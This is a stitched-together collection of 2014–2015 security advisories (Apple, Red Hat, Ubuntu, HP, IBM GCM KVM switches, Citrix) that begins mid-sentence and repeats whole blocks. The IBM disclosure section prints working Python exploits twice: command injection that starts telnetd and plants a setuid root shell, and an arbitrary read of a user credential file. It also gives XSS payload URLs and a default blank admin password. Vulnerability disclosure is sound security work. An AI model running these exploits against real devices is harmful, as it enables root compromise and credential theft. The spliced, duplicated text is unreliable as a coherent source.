crafted iWork file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of iWork files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1098 : Christopher Hickstein SceneKit Available for: OS X Mountain Lion v10.8.5 Impact: Viewing a maliciously crafted Collada file may lead to arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. Viewing a maliciously crafted Collada file may have led to arbitrary code execution. This issue was addressed through improved validation of accessor elements. CVE-ID CVE-2014-8830 : Jose Duart of Google Security Team Screen Sharing Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A user's password may be logged to a local file Description: In some circumstances, Screen Sharing may log a user's password that is not readable by other users on the system. This issue was addressed by removing logging of credential. CVE-ID CVE-2015-1148 : Apple Security - Code Signing Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Tampered applications may not be prevented from launching Description: Applications containing specially crafted bundles may have been able to launch without a completely valid signature. This issue was addressed by adding additional checks. CVE-ID CVE-2015-1145 CVE-2015-1146 UniformTypeIdentifiers Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow existed in the way Uniform Type Identifiers were handled. This issue was addressed with improved bounds checking. CVE-ID CVE-2015-1144 : Apple WebKit Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in WebKit. This issues was addressed through improved memory handling. CVE-ID CVE-2015-1069 : lokihardt@ASRT working with HP's Zero Day Initiative Security Update 2015-004 (available for OS X Mountain Lion v10.8.5 and OS X Mavericks v10.9.5) also addresses an issue caused by the fix for CVE-2015-1067 in Security Update 2015-002. This issue prevented Remote Apple Events clients on any version from connecting to the Remote Apple Events server. In default configurations, Remote Apple Events is not enabled. OS X Yosemite 10.10.3 includes the security content of Safari 8.0.5. https://support.apple.com/en-us/HT204658 OS X Yosemite 10.10.3 and Security Update 2015-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJVJKj2AAoJEBcWfLTuOo7tDh4QAK0LxfwMRKcdOXOKpXsRz6lg lhZ+CLVcSepq8qBkFQ74f3B5CuhxD0IGQPaAuSXl51tWYdfN+92tkbmyZ9k8901l +I0vw6upeE+oqRnGtSRzq68UhcARbdV8V1+C0Xl3IIuuHc+xlEgvklDhF9Pc8XM6 DudGiVNqt6MOqd5Oc4s4FFF0nnpnyG9+UJem3mi4Ee88PwI4x1Hev7utPPmaPDzj cjkVeislko3QArNJxtBpkYudErA4eR5OX8Tdf12jAmPTtjrXUb3VigEf78Nna0RW kHTOGdB5EZ+YFZ8KlyIQlENBjTtI8CGdCF4/S/2xDN83NTRsimd5Y7LSjdd0uANo pqxAc3Gzn5xngWF1Qbb6V+XZBfz5NoeTq5BXBB5OHz4PSGaQuMsBA2RYFMzNLqWv D/T5U1JtzRLALt0lYAz63B0OhW7KXeLI9oer1Vo4wWF9O9cUFyuSI4JU5uYLQpJX kEpSFt4YPFFxMnlzCLzLkmVGax4w9M/tRHYeSKAnRlnsoPBtIGFItlNZE2RduD/R 5n2APoJa3banQ8miycGORYP3WsktDRZzBy+2QPWuz8sE3AvAkO9xWp8PrQBkqf/b 6CIG5UkCYITG2uzBXqnGbfDiEDvBLNN1Yq0ZZI23iYRxrdW0I0pv1CHio354q12G vVE37tYUU4PnLfwlcazq =MOsT -----END PGP SIGNATURE----- . mod_lua.c in the mod_lua module in the Apache HTTP Server through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory (CVE-2014-8109). A malicious client could use Trailer headers to set additional HTTP headers after header processing was performed by other modules. This could, for example, lead to a bypass of header restrictions defined with mod_headers (CVE-2013-5704). A newly introduced configuration directive MergeTrailers can be used to re-enable the old method of processing Trailer headers, which also re-introduces the aforementioned flaw. This update also fixes the following bug: Prior to this update, the mod_proxy_wstunnel module failed to set up an SSL connection when configured to use a back end server using the wss: URL scheme, causing proxied connections to fail. In these updated packages, SSL is used when proxying to wss: back end servers (rhbz#1141950). The verification of md5 checksums and GPG signatures is performed automatically for you. 7) - noarch, x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: httpd security update Advisory ID: RHSA-2014:0921-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0921.html Issue date: 2014-07-23 CVE Names: CVE-2013-4352 CVE-2014-0117 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 ===================================================================== 1. Summary: Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7. The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user. (CVE-2014-0226) A NULL pointer dereference flaw was found in the mod_cache httpd module. (CVE-2013-4352) A denial of service flaw was found in the mod_proxy httpd module. (CVE-2014-0117) A denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the "DEFLATE" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. (CVE-2014-0118) A denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231) All httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1120596 - CVE-2014-0231 httpd: mod_cgid denial of service 1120599 - CVE-2014-0117 httpd: mod_proxy denial of service 1120601 - CVE-2014-0118 httpd: mod_deflate denial of service 1120603 - CVE-2014-0226 httpd: mod_status heap-based buffer overflow 1120604 - CVE-2013-4352 httpd: mod_cache NULL pointer dereference crash 6. Package List: Red Hat Enterprise Linux Client Optional (v. 7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm ppc64: httpd-2.4.6-18.el7_0.ppc64.rpm httpd-debuginfo-2.4.6-18.el7_0.ppc64.rpm httpd-devel-2.4.6-18.el7_0.ppc64.rpm httpd-tools-2.4.6-18.el7_0.ppc64.rpm mod_ssl-2.4.6-18.el7_0.ppc64.rpm s390x: httpd-2.4.6-18.el7_0.s390x.rpm httpd-debuginfo-2.4.6-18.el7_0.s390x.rpm httpd-devel-2.4.6-18.el7_0.s390x.rpm httpd-tools-2.4.6-18.el7_0.s390x.rpm mod_ssl-2.4.6-18.el7_0.s390x.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: httpd-debuginfo-2.4.6-18.el7_0.ppc64.rpm mod_ldap-2.4.6-18.el7_0.ppc64.rpm mod_proxy_html-2.4.6-18.el7_0.ppc64.rpm mod_session-2.4.6-18.el7_0.ppc64.rpm s390x: httpd-debuginfo-2.4.6-18.el7_0.s390x.rpm mod_ldap-2.4.6-18.el7_0.s390x.rpm mod_proxy_html-2.4.6-18.el7_0.s390x.rpm mod_session-2.4.6-18.el7_0.s390x.rpm x86_64: httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: httpd-2.4.6-18.el7_0.src.rpm noarch: httpd-manual-2.4.6-18.el7_0.noarch.rpm x86_64: httpd-2.4.6-18.el7_0.x86_64.rpm httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm httpd-devel-2.4.6-18.el7_0.x86_64.rpm httpd-tools-2.4.6-18.el7_0.x86_64.rpm mod_ssl-2.4.6-18.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: httpd-debuginfo-2.4.6-18.el7_0.x86_64.rpm mod_ldap-2.4.6-18.el7_0.x86_64.rpm mod_proxy_html-2.4.6-18.el7_0.x86_64.rpm mod_session-2.4.6-18.el7_0.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-4352.html https://www.redhat.com/security/data/cve/CVE-2014-0117.html https://www.redhat.com/security/data/cve/CVE-2014-0118.html https://www.redhat.com/security/data/cve/CVE-2014-0226.html https://www.redhat.com/security/data/cve/CVE-2014-0231.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTz4k8XlSAg2UNWIIRAhYKAJ9g2VrkFgyFz55UEfv0x8fGXSyjwACghfJ7 zOzeWbMF1aXEVExM5K4QNMA= =qBwW -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2299-1 July 23, 2014 apache2 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS - Ubuntu 10.04 LTS Summary: Several security issues were fixed in Apache HTTP Server. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-0118) Marek Kroemeke and others discovered that the mod_status module incorrectly handled certain requests. (CVE-2014-0226) Rainer Jung discovered that the mod_cgid module incorrectly handled certain scripts. (CVE-2014-0231) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.04 LTS: apache2-bin 2.4.7-1ubuntu4.1 Ubuntu 12.04 LTS: apache2.2-bin 2.2.22-1ubuntu1.7 Ubuntu 10.04 LTS: apache2.2-bin 2.2.14-5ubuntu8.14 In general, a standard system update will make all the necessary changes

Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote authenticated users to gain privileges via unknown vectors. Both the HP StoreVirtual 4000 Storage and the StoreVirtual VSA are storage devices for virtualized environments from Hewlett Packard (HP). The StoreVirtual 4000 Storage is a scale-out storage platform based on the LeftHand operating system. The StoreVirtual VSA is a set of software-defined virtual storage devices. A security vulnerability exists in the HP StoreVirtual 4000 Storage and StoreVirtual VSA versions 9.5 through 11.0. Successful exploits may compromise affected computers. Note: Technical details are currently unavailable. We will update this BID as soon as more information becomes available. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04281279 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04281279 Version: 1 HPSBST03039 rev.1 - HP StoreVirtual 4000 Storage and StoreVirtual VSA, Remote Disclosure of Information, Elevation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-14 Last Updated: 2014-07-14 Potential Security Impact: Remote disclosure of information, elevation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP StoreVirtual 4000 Storage and StoreVirtual VSA. The vulnerabilities could be exploited remotely resulting in disclosure of information. References: CVE-2014-2605 - Remote Disclosure of Information CVE-2014-2606 - Elevation of Privilege SSRT101457 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. RESOLUTION HP has made the following software update and mitigation information available to resolve the vulnerabilities. HP recommends the following steps from the HP StoreVirtual 4000 Storage: Network design considerations and best practices documentation to mitigate the risk of CVE-2014-2605: the StoreVirtual iSCSI traffic and management traffic should not reside on the same network the management traffic should remain on the customers local network the management traffic should be isolated from external network traffic Reference: HP StoreVirtual 4000 Storage: Network design considerations and best practices http://h20195.www2.hp.com/v2/GetPDF.aspx/4AA2-5615ENW.pdf HISTORY Version:1 (rev.1) - 14 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlPED1wACgkQ4B86/C0qfVlQQQCgg9Ua7My5XNzQtzYNBvc8pLbY 4sMAoLnkaARplUynZNpDPJaGamivrXyY =DVTJ -----END PGP SIGNATURE-----

Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote attackers to obtain sensitive information via unknown vectors. Both the HP StoreVirtual 4000 Storage and the StoreVirtual VSA are storage devices for virtualized environments from Hewlett Packard (HP). The StoreVirtual 4000 Storage is a scale-out storage platform based on the LeftHand operating system. The StoreVirtual VSA is a set of software-defined virtual storage devices. A security vulnerability exists in the HP StoreVirtual 4000 Storage and StoreVirtual VSA versions 9.5 through 11.0. Note: Technical details are currently unavailable. We will update this BID as soon as more information becomes available. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04281279 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04281279 Version: 1 HPSBST03039 rev.1 - HP StoreVirtual 4000 Storage and StoreVirtual VSA, Remote Disclosure of Information, Elevation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-14 Last Updated: 2014-07-14 Potential Security Impact: Remote disclosure of information, elevation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP StoreVirtual 4000 Storage and StoreVirtual VSA. References: CVE-2014-2605 - Remote Disclosure of Information CVE-2014-2606 - Elevation of Privilege SSRT101457 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. RESOLUTION HP has made the following software update and mitigation information available to resolve the vulnerabilities. HP recommends the following steps from the HP StoreVirtual 4000 Storage: Network design considerations and best practices documentation to mitigate the risk of CVE-2014-2605: the StoreVirtual iSCSI traffic and management traffic should not reside on the same network the management traffic should remain on the customers local network the management traffic should be isolated from external network traffic Reference: HP StoreVirtual 4000 Storage: Network design considerations and best practices http://h20195.www2.hp.com/v2/GetPDF.aspx/4AA2-5615ENW.pdf HISTORY Version:1 (rev.1) - 14 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlPED1wACgkQ4B86/C0qfVlQQQCgg9Ua7My5XNzQtzYNBvc8pLbY 4sMAoLnkaARplUynZNpDPJaGamivrXyY =DVTJ -----END PGP SIGNATURE-----

Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following versions are vulnerable: IBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior IBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the 'query' string in the kvm.cgi file and insufficient filtering of the 'key' parameter in the avctalert.php script . *Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target. PoC of this vulnerability: #!/usr/bin/python """ This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. An attacker can exploit this issue to read an arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. *Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Files can be anywhere on the target. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com

Cross-site scripting (XSS) vulnerability in administration user interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) 10.1 before 10.1-126.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Citrix NetScaler Application Delivery Controller 10.x prior 10.1-126.12 and 9.x prior 9.3-62.4 are vulnerable. Note: Citrix NetScaler Gateway is formerly known as Citrix Access Gateway Enterprise Edition. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20140716-2 > ======================================================================= title: Multiple vulnerabilities product: Citrix NetScaler Application Delivery Controller Citrix NetScaler Gateway vulnerable version: <9.3-62.4 <10.1-126.12 fixed version: >=9.3-62.4 >=10.1-126.12 CVE: CVE-2014-4346, CVE-2014-4347 impact: High homepage: http://www.citrix.com found: 2014-01-05 by: Stefan Viehb\xf6ck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: - ----------------------------- "Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers." "As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform." URL: 